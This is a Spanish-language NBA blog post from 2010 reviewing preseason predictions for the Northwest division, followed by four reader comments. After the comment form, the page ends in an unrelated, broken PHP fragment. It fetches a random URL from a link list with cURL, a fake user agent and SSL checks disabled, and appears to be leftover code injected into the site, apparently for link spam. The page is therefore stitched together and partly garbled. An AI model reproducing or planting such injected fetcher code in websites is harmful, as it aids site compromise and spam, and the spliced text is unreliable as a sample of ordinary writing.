Revisando los pronósticos t2010: Northwest

23 de February de 2010 por TheDeerHunter

Denver Nuggets: Les pusimos un peldaño por debajo de Spurs y Lakers y al mismo nivel que Portland y Dallas, pero estos Nuggets parecen empeñados en hacernos quedar mal año tras año. El nivel de juego mostrado tiene poco que ver con Spurs, Portland o Dallas y no tanto que envidiar al de Lakers. Ya fueron un hueso duro antaño. Mientras no se demuestre lo contrario ahora son candidatos a todo. Nada de segundas rondas. Todo lo que no sea llegar a la final del Oeste, como mínimo, es un fracaso.

Lo mejor: El mejor Carmelo Anthony de la historia. El líder que siempre debió ser. El estilete de uno de los equipos mejor armados ofensivamente.

Lo peor: Su rendimiento fuera de casa es muy mejorable. Algunas rachas de desorientación que evocan los peores defectos de otras épocas.

Utah Jazz: La Northwest está de moda y es que en esta división coinciden varias de las sensaciones del campeonato. Empezaron flojos, pero en el nuevo año se están mostrando casi intratables coincidiendo con el renacimiento de Kirilenko, el buen hacer de todos la plantilla y una defensa que vuelve a ser made in Sloan. Las previsiones, que ya fueron optimistas por nuestra parte, siguen siendo de 2ª ronda, por la tremenda competitividad del Wild Wild West… Pero ahora nadie debería tomárselos a la ligera en ningún cruce, llámese Lakers y, sobre todo, llámese cualquier otro.

Lo mejor: Desde el 9 de enero de 2010 acumulan un acojonante balance próximo al 90%. Deron All-Star. AK47 renacido. Boozer implicado. Un diferencial de anotados/encajados de 5 puntos. Ahora mismo dan imagen de finalista de conferencia.

Lo peor: La perspectiva del cruce en 2ª ronda en teórica desventaja. Aunque no serán ningún plato de gusto para quien les toque en suerte.

Oklahoma Thunder: ¡Y tanto que están aquí! Cómo que son el equipo de moda, consolidados por méritos propios en plaza de playoffs… y no sabemos si fue toda una profecía el comentario de los hachazos de “El Resplandor” con respecto a lo que se ha destapado como una de las defensas más agresivas de la liga. Todo esto teniendo en cuenta que es un equipo muy joven, casi bisoño, ideado 100% desde el talento de su tríada principal: Durant, Westbrook y Green. Eso sí… mucho resplandor y tal pero les dimos fuera de playoffs. Tiene toda la pinta que nos lo vamos a comer con patatas. Está visto que no tenemos poderes como el chiquillo del relato de Stephen King.

Lo mejor: En un par de años han pasado de ser el equipo desagüe de la liga a ser uno de los más atractivos y competitivos de todos. El reconocimiento de Durant como all-star casi se queda corto.

Lo peor: Viendo los juegos interiores que circulan por la conferencia en playoffs van a tener que multiplicarse para tener opciones. La experiencia es un grado y en este caso un hándicap para ellos.

Portland Trailblazers: ¿Quién les ha puesto la pierna encima a los Blazers para que no levanten cabeza? A las puertas les veíamos y a las puertas se van a quedar, aunque entonces hablábamos de la gloria y ahora hablamos simplemente de post-temporada. Ya se pueden dar con un canto en los dientes si la alcanzan. Donde hace no mucho veíamos el equipo con más futuro de la liga ahora se vislumbran muchos fantasmas. Todo generado desde la desgracia pero ¿porqué se tuvo que esperar a que media plantilla estuviera lesionada para darle la batuta a Andre Miller? ¿Porqué a Blake, quien hace nada era imprescindible, le dan boleta sin pestañear? ¿Porqué hacen intransferible a Rudy con el mínimo peso que tiene en este equipo? El caso es que las eventualidades nos impiden evaluar el tema con perspectiva. Cualquier pronóstico en esta tesitura era imposible.

Lo mejor: A pesar de alguno Andre Miller, también Webster. Las dificultades han obligado a dar el paso con algunos deshauciados de  McMillan y estos han respondido bastante bien.

Lo peor: La enfermería, que la tienen colapsada. El caso Oden es realmente preocupante y podría dar al traste con el proyecto entero. Me hubiera gustado saber que haría McMillan con la plantilla al completo y con exigencias. Habrá que esperar. Rudy toda la temporada muy desorientado.

Minnesota Timberwolves: Tampoco había que ser Nostradamus para darles como candidatos a la cuchara de madera pero es que el panorama está resultando todavía peor de lo que imaginábamos y no hablamos de su triste balance victorias/derrotas. Lo de Al Jefferson como all-star hay que borrarlo. Malas migas está haciendo con Love y es lo peor que le podía pasar a este equipo. Para colmo el 42 ha permanecido mucho tiempo en el dique seco y por si faltaba algo Sessions ha salido rana. En fin, que la reconstrucción va para largo… y mientras Ricky siendo importante en todos los títulos que gana el Barça, como para que le pique el irse a pasar frío en Mineapolis.

Lo mejor: Jonny Flynn está cuajando una buena campaña.

Lo peor: A Al Jefferson no le sienta bien jugar al lado de Love. Tendrán que decidirse por uno. Lo mismo que pasará si algún día Ricky se anima. Están ellos como para tener que elegir entre sus propios picks del draft.

Comenta

4 comentarios a esta entrada

  1. sergio dice:
    #1

    A mi el Durant-Westrbrook-Green me recuerda al Kidd-Jefferson-Martin…. no me preguntesis porque. Eso si, en el Oeste actual eso no te sirve de nada.

      Citar

  2. NBA LAKERS BLOG dice:
    #2

    La verdad, lo de los Nuggets es excelente. Juegan mucho mejor que los Cavs, a mi parecer. Y Melo maduró muchisimo, y al lado de Billups forman un equipazo.

    Lo del Thunder no me sorprende tanto, supe que serían buenos desde el comienzo. Un buen centro dominante y anotador (¿Por qué no Amare Stoudamire o Carlos Boozer?) y van en serio en los Playoffs. Durant es un crack. HIstorias completamente diferentes en cuanto a comienzos con los Bobcats.

    Buen analisis!

    Te espero en nuestro blog de los Lakers 😉

    Un fuerte abrazo!

    -NLB-

      Citar

  3. kantonyo dice:
    #3

    Totalmente de acuerdo, Kevin Durant es un grande. Ha llevado una franquicia y una plantilla del mayor abismo a ser claro favorito para pasar a segunda ronda de playoffs y si se hacen las cosas bien no tienen techo.

      Citar

  4. Dantley2 dice:
    #4

    Kevin Durant es muy grande, qué capacidad ofensiva, es tremendo. En puridad creo que únicamente Kobe está por encima y esperemos a que Durant coja experiencia. LeBron es LeBron y casi es por aplastamiento, pero por calidad ofensiva, es tremendo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>